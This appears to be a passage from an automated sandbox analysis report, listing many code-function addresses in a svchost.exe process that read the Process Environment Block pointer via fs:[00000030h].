                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h] 1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036DE3DB mov ecx, dword ptr fs:[00000030h] 1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h] 1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036D43D4 mov eax, dword ptr fs:[00000030h] 1_2_036D43D4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036D43D4 mov eax, dword ptr fs:[00000030h] 1_2_036D43D4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h] 1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h] 1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h] 1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0365438F mov eax, dword ptr fs:[00000030h] 1_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0365438F mov eax, dword ptr fs:[00000030h] 1_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03628397 mov eax, dword ptr fs:[00000030h] 1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03628397 mov eax, dword ptr fs:[00000030h] 1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03628397 mov eax, dword ptr fs:[00000030h] 1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03634260 mov eax, dword ptr fs:[00000030h] 1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03634260 mov eax, dword ptr fs:[00000030h] 1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03634260 mov eax, dword ptr fs:[00000030h] 1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0362826B mov eax, dword ptr fs:[00000030h] 1_2_0362826B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h] 1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h] 1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h] 1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h] 1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h] 1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h] 1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h] 1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h] 1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h] 1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h] 1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h] 1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h] 1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B8243 mov eax, dword ptr fs:[00000030h] 1_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B8243 mov ecx, dword ptr fs:[00000030h] 1_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0370625D mov eax, dword ptr fs:[00000030h] 1_2_0370625D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0362A250 mov eax, dword ptr fs:[00000030h] 1_2_0362A250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03636259 mov eax, dword ptr fs:[00000030h] 1_2_03636259
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036EA250 mov eax, dword ptr fs:[00000030h] 1_2_036EA250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036EA250 mov eax, dword ptr fs:[00000030h] 1_2_036EA250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0362823B mov eax, dword ptr fs:[00000030h] 1_2_0362823B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h] 1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h] 1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h] 1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037062D6 mov eax, dword ptr fs:[00000030h] 1_2_037062D6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036402A0 mov eax, dword ptr fs:[00000030h] 1_2_036402A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036402A0 mov eax, dword ptr fs:[00000030h] 1_2_036402A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h] 1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036C62A0 mov ecx, dword ptr fs:[00000030h] 1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h] 1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h] 1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h] 1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h] 1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366E284 mov eax, dword ptr fs:[00000030h] 1_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366E284 mov eax, dword ptr fs:[00000030h] 1_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h] 1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h] 1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h] 1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03704164 mov eax, dword ptr fs:[00000030h] 1_2_03704164
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03704164 mov eax, dword ptr fs:[00000030h] 1_2_03704164
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h] 1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h] 1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036C4144 mov ecx, dword ptr fs:[00000030h] 1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h] 1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h] 1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0362C156 mov eax, dword ptr fs:[00000030h] 1_2_0362C156
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036C8158 mov eax, dword ptr fs:[00000030h] 1_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03636154 mov eax, dword ptr fs:[00000030h] 1_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03636154 mov eax, dword ptr fs:[00000030h] 1_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03660124 mov eax, dword ptr fs:[00000030h] 1_2_03660124
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h] 1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h] 1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h] 1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h] 1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h] 1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h] 1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h] 1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h] 1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h] 1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h] 1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036DA118 mov ecx, dword ptr fs:[00000030h] 1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h] 1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h] 1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h] 1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036F0115 mov eax, dword ptr fs:[00000030h] 1_2_036F0115
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037061E5 mov eax, dword ptr fs:[00000030h] 1_2_037061E5
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036601F8 mov eax, dword ptr fs:[00000030h] 1_2_036601F8
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036F61C3 mov eax, dword ptr fs:[00000030h] 1_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036F61C3 mov eax, dword ptr fs:[00000030h] 1_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036AE1D0 mov ecx, dword ptr fs:[00000030h] 1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03670185 mov eax, dword ptr fs:[00000030h] 1_2_03670185
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036EC188 mov eax, dword ptr fs:[00000030h] 1_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036EC188 mov eax, dword ptr fs:[00000030h] 1_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036D4180 mov eax, dword ptr fs:[00000030h] 1_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036D4180 mov eax, dword ptr fs:[00000030h] 1_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B019F mov eax, dword ptr fs:[00000030h] 1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B019F mov eax, dword ptr fs:[00000030h] 1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]1_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]1_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]1_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365C073 mov eax, dword ptr fs:[00000030h]1_2_0365C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632050 mov eax, dword ptr fs:[00000030h]1_2_03632050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6050 mov eax, dword ptr fs:[00000030h]1_2_036B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A020 mov eax, dword ptr fs:[00000030h]1_2_0362A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C020 mov eax, dword ptr fs:[00000030h]1_2_0362C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6030 mov eax, dword ptr fs:[00000030h]1_2_036C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4000 mov ecx, dword ptr fs:[00000030h]1_2_036B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0362A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036380E9 mov eax, dword ptr fs:[00000030h]1_2_036380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B60E0 mov eax, dword ptr fs:[00000030h]1_2_036B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C0F0 mov eax, dword ptr fs:[00000030h]1_2_0362C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036720F0 mov ecx, dword ptr fs:[00000030h]1_2_036720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B20DE mov eax, dword ptr fs:[00000030h]1_2_036B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036280A0 mov eax, dword ptr fs:[00000030h]1_2_036280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C80A8 mov eax, dword ptr fs:[00000030h]1_2_036C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F60B8 mov eax, dword ptr fs:[00000030h]1_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F60B8 mov ecx, dword ptr fs:[00000030h]1_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363208A mov eax, dword ptr fs:[00000030h]1_2_0363208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638770 mov eax, dword ptr fs:[00000030h]1_2_03638770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366674D mov esi, dword ptr fs:[00000030h]1_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366674D mov eax, dword ptr fs:[00000030h]1_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366674D mov eax, dword ptr fs:[00000030h]1_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630750 mov eax, dword ptr fs:[00000030h]1_2_03630750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE75D mov eax, dword ptr fs:[00000030h]1_2_036BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672750 mov eax, dword ptr fs:[00000030h]1_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672750 mov eax, dword ptr fs:[00000030h]1_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4755 mov eax, dword ptr fs:[00000030h]1_2_036B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C720 mov eax, dword ptr fs:[00000030h]1_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C720 mov eax, dword ptr fs:[00000030h]1_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366273C mov eax, dword ptr fs:[00000030h]1_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366273C mov ecx, dword ptr fs:[00000030h]1_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366273C mov eax, dword ptr fs:[00000030h]1_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AC730 mov eax, dword ptr fs:[00000030h]1_2_036AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C700 mov eax, dword ptr fs:[00000030h]1_2_0366C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630710 mov eax, dword ptr fs:[00000030h]1_2_03630710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660710 mov eax, dword ptr fs:[00000030h]1_2_03660710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]1_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]1_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]1_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE7E1 mov eax, dword ptr fs:[00000030h]1_2_036BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036347FB mov eax, dword ptr fs:[00000030h]1_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036347FB mov eax, dword ptr fs:[00000030h]1_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363C7C0 mov eax, dword ptr fs:[00000030h]1_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B07C3 mov eax, dword ptr fs:[00000030h]1_2_036B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036307AF mov eax, dword ptr fs:[00000030h]1_2_036307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E47A0 mov eax, dword ptr fs:[00000030h]1_2_036E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D678E mov eax, dword ptr fs:[00000030h]1_2_036D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F866E mov eax, dword ptr fs:[00000030h]1_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F866E mov eax, dword ptr fs:[00000030h]1_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A660 mov eax, dword ptr fs:[00000030h]1_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A660 mov eax, dword ptr fs:[00000030h]1_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03662674 mov eax, dword ptr fs:[00000030h]1_2_03662674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364C640 mov eax, dword ptr fs:[00000030h]1_2_0364C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E627 mov eax, dword ptr fs:[00000030h]1_2_0364E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03666620 mov eax, dword ptr fs:[00000030h]1_2_03666620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668620 mov eax, dword ptr fs:[00000030h]1_2_03668620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363262C mov eax, dword ptr fs:[00000030h]1_2_0363262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE609 mov eax, dword ptr fs:[00000030h]1_2_036AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672619 mov eax, dword ptr fs:[00000030h]1_2_03672619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B06F1 mov eax, dword ptr fs:[00000030h]1_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B06F1 mov eax, dword ptr fs:[00000030h]1_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A6C7 mov eax, dword ptr fs:[00000030h]1_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C6A6 mov eax, dword ptr fs:[00000030h]1_2_0366C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036666B0 mov eax, dword ptr fs:[00000030h]1_2_036666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634690 mov eax, dword ptr fs:[00000030h]1_2_03634690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634690 mov eax, dword ptr fs:[00000030h]1_2_03634690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366656A mov eax, dword ptr fs:[00000030h]1_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366656A mov eax, dword ptr fs:[00000030h]1_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366656A mov eax, dword ptr fs:[00000030h]1_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638550 mov eax, dword ptr fs:[00000030h]1_2_03638550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638550 mov eax, dword ptr fs:[00000030h]1_2_03638550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
